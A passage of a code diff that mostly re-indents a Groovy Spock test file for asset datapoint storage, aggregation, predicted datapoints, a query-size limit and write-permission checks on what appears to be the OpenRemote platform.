+    assetDatapointService.maxAmountOfQueryPoints = 2
+
+    and: "the same datapoints are being requested"
+    assetDatapointService.queryDatapoints(
+            asset.getId(),
+            asset.getAttribute(attributeName).orElseThrow({
+              new RuntimeException("Missing attribute")
+            }),
+            new AssetDatapointAllQuery(dateTime.minusMinutes(30), dateTime)
+            )
+
+    then: "no points should be returned"
+    thrown(DatapointQueryTooLargeException)
+
+    cleanup: "Remove the limit on datapoint querying"
+    assetDatapointService.maxAmountOfQueryPoints = 0
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetDatapointTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetDatapointTest.groovy
@@ -73,669 +73,697 @@ import static spock.util.matcher.HamcrestMatchers.closeTo
 
 class AssetDatapointTest extends Specification implements ManagerContainerTrait {
 
-    protected static <T> T messageFromString(String message) {
-        try {
-            def isSubscription = message.startsWith(EventSubscription.SUBSCRIBED_MESSAGE_PREFIX)
-            def isTriggered = !isSubscription && message.startsWith(TriggeredEventSubscription.MESSAGE_PREFIX)
-            def isUnauthorized = !isSubscription && !isTriggered && message.startsWith(UnauthorizedEventSubscription.MESSAGE_PREFIX)
-            message = message.substring(message.indexOf(":") + 1)
-            return ValueUtil.JSON.readValue(message,
-                isSubscription ? EventSubscription.class : isTriggered ? TriggeredEventSubscription.class : isUnauthorized ? UnauthorizedEventSubscription.class : SharedEvent.class)
-        } catch (Exception e) {
-            throw new IllegalArgumentException("Unable to parse message")
-        }
+  protected static <T> T messageFromString(String message) {
+    try {
+      def isSubscription = message.startsWith(EventSubscription.SUBSCRIBED_MESSAGE_PREFIX)
+      def isTriggered = !isSubscription && message.startsWith(TriggeredEventSubscription.MESSAGE_PREFIX)
+      def isUnauthorized = !isSubscription && !isTriggered && message.startsWith(UnauthorizedEventSubscription.MESSAGE_PREFIX)
+      message = message.substring(message.indexOf(":") + 1)
+      return ValueUtil.JSON.readValue(message,
+              isSubscription ? EventSubscription.class : isTriggered ? TriggeredEventSubscription.class : isUnauthorized ? UnauthorizedEventSubscription.class : SharedEvent.class)
+    } catch (Exception e) {
+      throw new IllegalArgumentException("Unable to parse message")
     }
+  }
 
-    protected static String messageToString(String prefix, Object message) {
-        try {
-            String str = ValueUtil.asJSON(message).orElse(null)
-            return prefix + str
-        } catch (Exception e) {
-            throw new IllegalArgumentException("Unable to serialise message")
-        }
+  protected static String messageToString(String prefix, Object message) {
+    try {
+      String str = ValueUtil.asJSON(message).orElse(null)
+      return prefix + str
+    } catch (Exception e) {
+      throw new IllegalArgumentException("Unable to serialise message")
     }
+  }
 
-    protected WebsocketIOClient<String> createPredictedDatapointWebsocketClient(
-        int serverPort,
-        String websocketRealm,
-        String authRealm,
-        String username,
-        String password
-    ) {
-        def client = new WebsocketIOClient<String>(
+  protected WebsocketIOClient<String> createPredictedDatapointWebsocketClient(
+          int serverPort,
+          String websocketRealm,
+          String authRealm,
+          String username,
+          String password
+  ) {
+    def client = new WebsocketIOClient<String>(
             new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=$websocketRealm").build(),
             null,
             new OAuthPasswordGrant(
-                "http://127.0.0.1:$serverPort/auth/realms/$authRealm/protocol/openid-connect/token",
-                KEYCLOAK_CLIENT_ID,
-                null,
-                null,
-                username,
-                password
-            )
-        )
-        client.setEncoderDecoderProvider({
-            [
-                new StringEncoder(CharsetUtil.UTF_8),
-                new StringDecoder(CharsetUtil.UTF_8),
-                new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
-            ].toArray(new ChannelHandler[0])
-        })
-        return client
-    }
-
-    def "Test number and toggle attribute storage, retrieval and purging"() {
-
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        when: "the demo agent and thing have been deployed"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def agentService = container.getService(AgentService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        def clientEventService = container.getService(ClientEventService.class)
-
-        and: "the clock is stopped for testing purposes and advanced to the next hour"
-        stopPseudoClock()
-        advancePseudoClock(Instant.ofEpochMilli(getClockTimeOf(container)).truncatedTo(ChronoUnit.HOURS).plus(1, ChronoUnit.HOURS).toEpochMilli() - getClockTimeOf(container), TimeUnit.MILLISECONDS, container)
-
-        and: "a resource client is created"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-        // Resteasy client has issues with @Suspended annotation so not used for now
-        //def datapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetDatapointResource.class)
-        def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetPredictedDatapointResource.class)
-
-        then: "the simulator protocol instance should have been initialised and attributes linked"
-        conditions.eventually {
-            assert agentService.protocolInstanceMap.get(managerTestSetup.agentId) != null
-            assert ((SimulatorProtocol) agentService.protocolInstanceMap.get(managerTestSetup.agentId)).linkedAttributes.size() == 4
-            assert ((SimulatorProtocol) agentService.protocolInstanceMap.get(managerTestSetup.agentId)).linkedAttributes.get(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption")).getValue(Double.class).orElse(0d) == 12.345d
-        }
-
-        when: "an attribute linked to the simulator agent receives some values"
-        def simulatorProtocol = ((SimulatorProtocol) agentService.protocolInstanceMap.get(managerTestSetup.agentId))
-        advancePseudoClock(60, SECONDS, container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 13.3d)
-        advancePseudoClock(60, SECONDS, container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), null)
-        advancePseudoClock(60, SECONDS, container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 13.3d)
-
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert thing.getAttribute("light1PowerConsumption").flatMap { it.getValue(Double.class) }.orElse(null) == 13.3d
-        }
-
-        when: "a simulated sensor receives a new value"
-        advancePseudoClock(60, SECONDS, container)
-        def datapoint1ExpectedTimestamp = getClockTimeOf(container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 13.5d)
-
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert thing.getAttribute("light1PowerConsumption").flatMap { it.getValue(Double.class) }.orElse(null) == 13.5d
-        }
-
-        when: "a simulated sensor receives a new value"
-        advancePseudoClock(60, SECONDS, container)
-        def datapoint2ExpectedTimestamp = getClockTimeOf(container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 14.4d)
-
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert thing.getAttribute("light1PowerConsumption").flatMap { it.getValue(Double.class) }.orElse(null) == 14.4d
-        }
-
-        when: "a simulated sensor receives a new value"
-        advancePseudoClock(60, SECONDS, container)
-        def datapoint3ExpectedTimestamp = getClockTimeOf(container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 15.5d)
-
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert thing.getAttribute("light1PowerConsumption").flatMap { it.getValue(Double.class) }.orElse(null) == 15.5d
-        }
-
-        when: "a simulated sensor receives a new value"
-        advancePseudoClock(60, SECONDS, container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), null)
-
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert !thing.getAttribute("light1PowerConsumption").flatMap { it.getValue() }.isPresent()
-        }
-
-        expect: "the datapoints to be stored"
-        conditions.eventually {
-            //def datapoints = datapointResource.getDatapoints(null, managerTestSetup.thingId, "light1PowerConsumption", null) as List
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"))
-            // Can include initial value when container is re-used between tests
-            assert datapoints.size() >= 5
-
-            // Note that the "No value" sensor update should not have created a datapoint, the first
-            // datapoint is the last sensor update with an actual value
-
-            assert datapoints.any{ it.value == 15.5d && it.timestamp == datapoint3ExpectedTimestamp}
-            assert datapoints.any{ it.value == 14.4d && it.timestamp == datapoint2ExpectedTimestamp}
-            assert datapoints.any{ it.value == 13.5d && it.timestamp == datapoint1ExpectedTimestamp}
-            assert datapoints.count{ it.value == 13.3d} == 2
-        }
-
-        and: "the aggregated datapoints should match"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            //def aggregatedDatapoints = datapointResource.getDatapoints(
-            def aggregatedDatapoints = assetDatapointService.queryDatapoints(
-                    thing.getId(),
-                    "light1PowerConsumption",
-                    new AssetDatapointIntervalQuery(
-                            Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime().minus(1, ChronoUnit.HOURS),
-                            Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime(),
-                            "minute",
-                            AssetDatapointIntervalQuery.Formula.AVG,
-                            true
+                    "http://127.0.0.1:$serverPort/auth/realms/$authRealm/protocol/openid-connect/token",
+                    KEYCLOAK_CLIENT_ID,
+                    null,
+                    null,
+                    username,
+                    password
                     )
             )
-            assert aggregatedDatapoints.size() == 61
-            assert aggregatedDatapoints[54].value == 13.3
-            assert aggregatedDatapoints[55].value == null
-            assert aggregatedDatapoints[56].value == 13.3
-            assert aggregatedDatapoints[57].value == 13.5
-            assert aggregatedDatapoints[58].value == 14.4
-            assert aggregatedDatapoints[59].value == 15.5
-            assert aggregatedDatapoints[60].value == null
-        }
+    client.setEncoderDecoderProvider({
+      [
+        new StringEncoder(CharsetUtil.UTF_8),
+        new StringDecoder(CharsetUtil.UTF_8),
+        new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, client)
+      ].toArray(new ChannelHandler[0])
+    })
+    return client
+  }
 
-        and: "when the step size is set on the datapoint retrieval then the datapoints should match"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            //def aggregatedDatapoints = datapointResource.getDatapoints(
-            def aggregatedDatapoints = assetDatapointService.queryDatapoints(
-                    thing.getId(),
-                    "light1PowerConsumption",
-                    new AssetDatapointIntervalQuery(
-                            Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime().minus(1, ChronoUnit.HOURS),
-                            Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime(),
-                            "5 minutes",
-                            AssetDatapointIntervalQuery.Formula.AVG,
-                            true
-                    )
-            )
-            assert aggregatedDatapoints.size() == 13
-            assert aggregatedDatapoints[11].value, closeTo(13.36666, 0.0001)
-            assert aggregatedDatapoints[12].value == 14.95
-        }
+  def "Test number and toggle attribute storage, retrieval and purging"() {
 
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        // ------------------------------------
-        // Test boolean data point storage
-        // ------------------------------------
+    when: "the demo agent and thing have been deployed"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def agentService = container.getService(AgentService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    def clientEventService = container.getService(ClientEventService.class)
 
-        when: "a simulated boolean sensor receives a new value"
-        advancePseudoClock(1, MINUTES, container)
-        datapoint1ExpectedTimestamp = getClockTimeOf(container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), false)
+    and: "the clock is stopped for testing purposes and advanced to the next hour"
+    stopPseudoClock()
+    advancePseudoClock(Instant.ofEpochMilli(getClockTimeOf(container)).truncatedTo(ChronoUnit.HOURS).plus(1, ChronoUnit.HOURS).toEpochMilli() - getClockTimeOf(container), TimeUnit.MILLISECONDS, container)
 
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert !thing.getAttribute(thingLightToggleAttributeName).flatMap { it.getValue(Boolean.class) }.orElse(null)
-        }
-
-        when: "a simulated sensor receives a new value"
-        advancePseudoClock(1, MINUTES, container)
-        datapoint2ExpectedTimestamp = getClockTimeOf(container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), true)
-
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert thing.getAttribute(thingLightToggleAttributeName).flatMap { it.getValue(Boolean.class) }.orElse(null)
-        }
-
-        when: "a simulated sensor receives a new value"
-        advancePseudoClock(1, MINUTES, container)
-        datapoint3ExpectedTimestamp = getClockTimeOf(container)
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), false)
-
-        then: "the attribute should be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert !thing.getAttribute(thingLightToggleAttributeName).flatMap { it.getValue(Boolean.class) }.orElse(null)
-        }
-
-        expect: "the datapoints to be stored"
-        conditions.eventually {
-            //def datapoints = datapointResource.getDatapoints(null, managerTestSetup.thingId, thingLightToggleAttributeName, null) as List
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName))
-            assert datapoints.size() >= 3
-
-            assert !ValueUtil.getBoolean(datapoints.get(0).value).orElse(null)
-            assert datapoints.get(0).timestamp == datapoint3ExpectedTimestamp
-
-            assert datapoints.any {it.timestamp == datapoint3ExpectedTimestamp && !(it.value as Boolean)}
-            assert datapoints.any {it.timestamp == datapoint2ExpectedTimestamp && (it.value as Boolean)}
-            assert datapoints.any {it.timestamp == datapoint3ExpectedTimestamp && !(it.value as Boolean)}
-        }
-
-        and: "the aggregated datapoints should match"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            //def aggregatedDatapoints = datapointResource.getDatapoints(
-            def aggregatedDatapoints = assetDatapointService.queryDatapoints(
-                    thing.getId(),
-                    thingLightToggleAttributeName,
-                    new AssetDatapointIntervalQuery(
-                            Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime().minus(1, ChronoUnit.HOURS),
-                            Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime(),
-                            "MINUTE",
-                            AssetDatapointIntervalQuery.Formula.AVG,
-                            true
-                    )
-            )
-            assert aggregatedDatapoints.size() == 61
-            assert aggregatedDatapoints[58].value == 0
-            assert aggregatedDatapoints[59].value == 1d
-            assert aggregatedDatapoints[60].value == 0
-        }
-
-        // ------------------------------------
-        // Test logging of outdated data points
-        // ------------------------------------
-
-        when: "a simulated sensor receives a new outdated value"
-        simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName), true, getClockTimeOf(container)-5000)
-
-        then: "the datapoint should be stored"
-        conditions.eventually {
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName))
-            assert datapoints.any {it.timestamp == getClockTimeOf(container)-5000 && (it.value as Boolean)}
-        }
-
-        and: "the attribute should not be updated"
-        conditions.eventually {
-            def thing = assetStorageService.find(managerTestSetup.thingId, true)
-            assert !thing.getAttribute(thingLightToggleAttributeName).flatMap { it.getValue(Boolean.class) }.orElse(true)
-            assert thing.getAttribute(thingLightToggleAttributeName).flatMap {it.getTimestamp()}.orElse(0) == getClockTimeOf(container)
-        }
-
-        when: "we subscribe to predicted data points events"
-        List<AssetPredictedDatapointEvent> predictedEvents = new CopyOnWriteArrayList<>()
-        Consumer<AssetPredictedDatapointEvent> predictedEventConsumer = { event ->
-            predictedEvents.add(event)
-        }
-        clientEventService.addSubscription(AssetPredictedDatapointEvent.class, null, predictedEventConsumer)
-
-        and: "predicted data points are added"
-        predictedDatapointResource.writePredictedDatapoints(null, managerTestSetup.thingId, "light1PowerConsumption",
-            [
-                new ValueDatapoint<>(getClockTimeOf(container)+60000, 10d),
-                new ValueDatapoint<>(getClockTimeOf(container)+120000, 20d),
-                new ValueDatapoint<>(getClockTimeOf(container)+180000, 30d),
-                new ValueDatapoint<>(getClockTimeOf(container)+240000, 40d),
-                new ValueDatapoint<>(getClockTimeOf(container)+300000, 50d)
-            ] as ValueDatapoint<?>[]
-        )
-        predictedDatapointResource.writePredictedDatapoints(null, managerTestSetup.thingId, thingLightToggleAttributeName,
-            [
-                new ValueDatapoint<>(getClockTimeOf(container)+60000, true),
-                new ValueDatapoint<>(getClockTimeOf(container)+120000, true),
-                new ValueDatapoint<>(getClockTimeOf(container)+180000, true),
-                new ValueDatapoint<>(getClockTimeOf(container)+240000, false),
-                new ValueDatapoint<>(getClockTimeOf(container)+300000, false)
-            ] as ValueDatapoint<?>[]
-        )
-
-        then: "the predicted data should be available"
-        def predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"))
-        assert predictedData.size() == 5
-        assert predictedData.any {it.value == 20d}
-
-        and: "an event should be published for predicted datapoints"
-        conditions.eventually {
-            assert predictedEvents.any {
-                it.ref.id == managerTestSetup.thingId &&
-                    it.ref.name == "light1PowerConsumption"
-            }
-            assert predictedEvents.any {
-                it.ref.id == managerTestSetup.thingId &&
-                    it.ref.name == thingLightToggleAttributeName
-            }
-        }
-
-        when: "the predicted data is purged and then retrieved"
-        assetPredictedDatapointService.purgeValues(managerTestSetup.thingId, "light1PowerConsumption")
-        predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"))
-
-        then: "no predicted data should remain for this attribute"
-        assert predictedData.isEmpty()
-
-        and: "an event should be published"
-        conditions.eventually {
-            assert predictedEvents.any {
-                it.ref.id == managerTestSetup.thingId &&
-                    it.ref.name == "light1PowerConsumption"
-            }
-        }
-
-        when: "other predicted data is retrieved"
-        predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, thingLightToggleAttributeName))
-
-        then: "predicted data should remain for this attribute"
-        assert predictedData.size() == 5
-        assert predictedData.count {it.value == false} == 2
-    }
-
-    def "Test anonymous predicted datapoint writes are allowed for public write attributes"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-
-        and: "the manager container and test setup are available"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-
-        and: "a public-write-only attribute exists on a public asset"
-        def attributeName = "predictedPublicWrite"
-        def apartment1 = assetStorageService.find(managerTestSetup.apartment1Id, true)
-        apartment1.getAttributes().addOrReplace(
-            new Attribute<>(attributeName, ValueType.NUMBER, 0d)
-                .addMeta(new MetaItem<>(ACCESS_PUBLIC_WRITE, true))
-        )
-        assetStorageService.merge(apartment1)
-
-        and: "an anonymous predicted datapoint API client"
-        def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(AssetPredictedDatapointResource.class)
-
-        when: "an anonymous predicted datapoint write is made"
-        predictedDatapointResource.writePredictedDatapoints(
-            null,
-            managerTestSetup.apartment1Id,
-            attributeName,
-            [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 12d)] as ValueDatapoint<?>[]
-        )
-
-        then: "the predicted datapoint should be stored"
-        conditions.eventually {
-            def predictedData = assetPredictedDatapointService.getDatapoints(new AttributeRef(managerTestSetup.apartment1Id, attributeName))
-            assert predictedData.size() == 1
-            assert predictedData[0].value == 12d
-        }
-    }
-
-    def "Test predicted datapoint writes are denied without WRITE_ATTRIBUTES role"() {
-        given: "the manager container and test setup are available"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-
-        and: "a building user with READ_ASSETS but without WRITE_ATTRIBUTES"
-        def accessToken = authenticate(
-            container,
-            keycloakTestSetup.realmBuilding.name,
-            KEYCLOAK_CLIENT_ID,
-            "testuser2",
-            "testuser2"
-        )
-        def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetPredictedDatapointResource.class)
-
-        when: "the user writes predicted datapoints"
-        predictedDatapointResource.writePredictedDatapoints(
-            null,
-            managerTestSetup.apartment1LivingroomId,
-            "targetTemperature",
-            [new ValueDatapoint<>(getClockTimeOf(container) + 60000, 19d)] as ValueDatapoint<?>[]
-        )
-
-        then: "access should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-    }
-
-    def "Test restricted predicted datapoint writes require restricted write meta"() {
-        given: "the manager container and test setup are available"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-
-        and: "a restricted user with linked assets"
-        def accessToken = authenticate(
-            container,
-            keycloakTestSetup.realmBuilding.name,
-            KEYCLOAK_CLIENT_ID,
-            "testuser3",
-            "testuser3"
-        )
-        def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetPredictedDatapointResource.class)
-
-        when: "the restricted user writes a predicted datapoint for an attribute without restricted write access"
-        predictedDatapointResource.writePredictedDatapoints(
-            null,
-            managerTestSetup.apartment1Id,
-            BuildingAsset.STREET.name,
-            [new ValueDatapoint<>(getClockTimeOf(container) + 60000, "should fail")] as ValueDatapoint<?>[]
-        )
-
-        then: "access should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-    }
-
-    def "Test predicted datapoint change events are received via websocket API"() {
-
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-
-        and: "the manager container and test setup are available"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-
-        and: "an authenticated predicted datapoint API client"
-        def accessToken = authenticate(
+    and: "a resource client is created"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             "testuser1",
             "testuser1"
-        )
-        def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetPredictedDatapointResource.class)
+            )
+    // Resteasy client has issues with @Suspended annotation so not used for now
+    //def datapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetDatapointResource.class)
+    def predictedDatapointResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetPredictedDatapointResource.class)
 
-        and: "a websocket client authenticated in the same realm"
-        def client = new WebsocketIOClient<String>(
+    then: "the simulator protocol instance should have been initialised and attributes linked"
+    conditions.eventually {
+      assert agentService.protocolInstanceMap.get(managerTestSetup.agentId) != null
+      assert ((SimulatorProtocol) agentService.protocolInstanceMap.get(managerTestSetup.agentId)).linkedAttributes.size() == 4
+      assert ((SimulatorProtocol) agentService.protocolInstanceMap.get(managerTestSetup.agentId)).linkedAttributes.get(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption")).getValue(Double.class).orElse(0d) == 12.345d
+    }
+
+    when: "an attribute linked to the simulator agent receives some values"
+    def simulatorProtocol = ((SimulatorProtocol) agentService.protocolInstanceMap.get(managerTestSetup.agentId))
+    advancePseudoClock(60, SECONDS, container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 13.3d)
+    advancePseudoClock(60, SECONDS, container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), null)
+    advancePseudoClock(60, SECONDS, container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 13.3d)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert thing.getAttribute("light1PowerConsumption").flatMap {
+        it.getValue(Double.class)
+      }.orElse(null) == 13.3d
+    }
+
+    when: "a simulated sensor receives a new value"
+    advancePseudoClock(60, SECONDS, container)
+    def datapoint1ExpectedTimestamp = getClockTimeOf(container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 13.5d)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert thing.getAttribute("light1PowerConsumption").flatMap {
+        it.getValue(Double.class)
+      }.orElse(null) == 13.5d
+    }
+
+    when: "a simulated sensor receives a new value"
+    advancePseudoClock(60, SECONDS, container)
+    def datapoint2ExpectedTimestamp = getClockTimeOf(container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 14.4d)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert thing.getAttribute("light1PowerConsumption").flatMap {
+        it.getValue(Double.class)
+      }.orElse(null) == 14.4d
+    }
+
+    when: "a simulated sensor receives a new value"
+    advancePseudoClock(60, SECONDS, container)
+    def datapoint3ExpectedTimestamp = getClockTimeOf(container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), 15.5d)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert thing.getAttribute("light1PowerConsumption").flatMap {
+        it.getValue(Double.class)
+      }.orElse(null) == 15.5d
+    }
+
+    when: "a simulated sensor receives a new value"
+    advancePseudoClock(60, SECONDS, container)
+    simulatorProtocol.updateSensor(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"), null)
+
+    then: "the attribute should be updated"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      assert !thing.getAttribute("light1PowerConsumption").flatMap {
+        it.getValue()
+      }.isPresent()
+    }
+
+    expect: "the datapoints to be stored"
+    conditions.eventually {
+      //def datapoints = datapointResource.getDatapoints(null, managerTestSetup.thingId, "light1PowerConsumption", null) as List
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(managerTestSetup.thingId, "light1PowerConsumption"))
+      // Can include initial value when container is re-used between tests
+      assert datapoints.size() >= 5
+
+      // Note that the "No value" sensor update should not have created a datapoint, the first
+      // datapoint is the last sensor update with an actual value
+
+      assert datapoints.any{ it.value == 15.5d && it.timestamp == datapoint3ExpectedTimestamp}
+      assert datapoints.any{ it.value == 14.4d && it.timestamp == datapoint2ExpectedTimestamp}
+      assert datapoints.any{ it.value == 13.5d && it.timestamp == datapoint1ExpectedTimestamp}
+      assert datapoints.count{ it.value == 13.3d} == 2
+    }
+
+    and: "the aggregated datapoints should match"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      //def aggregatedDatapoints = datapointResource.getDatapoints(
+      def aggregatedDatapoints = assetDatapointService.queryDatapoints(
+              thing.getId(),
+              "light1PowerConsumption",
+              new AssetDatapointIntervalQuery(
+                      Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime().minus(1, ChronoUnit.HOURS),
+                      Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime(),
+                      "minute",
+                      AssetDatapointIntervalQuery.Formula.AVG,
+                      true
+                      )
+              )
+      assert aggregatedDatapoints.size() == 61
+      assert aggregatedDatapoints[54].value == 13.3
+      assert aggregatedDatapoints[55].value == null
+      assert aggregatedDatapoints[56].value == 13.3
+      assert aggregatedDatapoints[57].value == 13.5
+      assert aggregatedDatapoints[58].value == 14.4
+      assert aggregatedDatapoints[59].value == 15.5
+      assert aggregatedDatapoints[60].value == null
+    }
+
+    and: "when the step size is set on the datapoint retrieval then the datapoints should match"
+    conditions.eventually {
+      def thing = assetStorageService.find(managerTestSetup.thingId, true)
+      //def aggregatedDatapoints = datapointResource.getDatapoints(
+      def aggregatedDatapoints = assetDatapointService.queryDatapoints(
+              thing.getId(),
+              "light1PowerConsumption",
+              new AssetDatapointIntervalQuery(
+                      Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime().minus(1, ChronoUnit.HOURS),
+                      Instant.ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.systemDefault()).toLocalDateTime(),
+                      "5 minutes",
+                      AssetDatapointIntervalQuery.Formula.AVG,
+                      true
+                      )
+              )
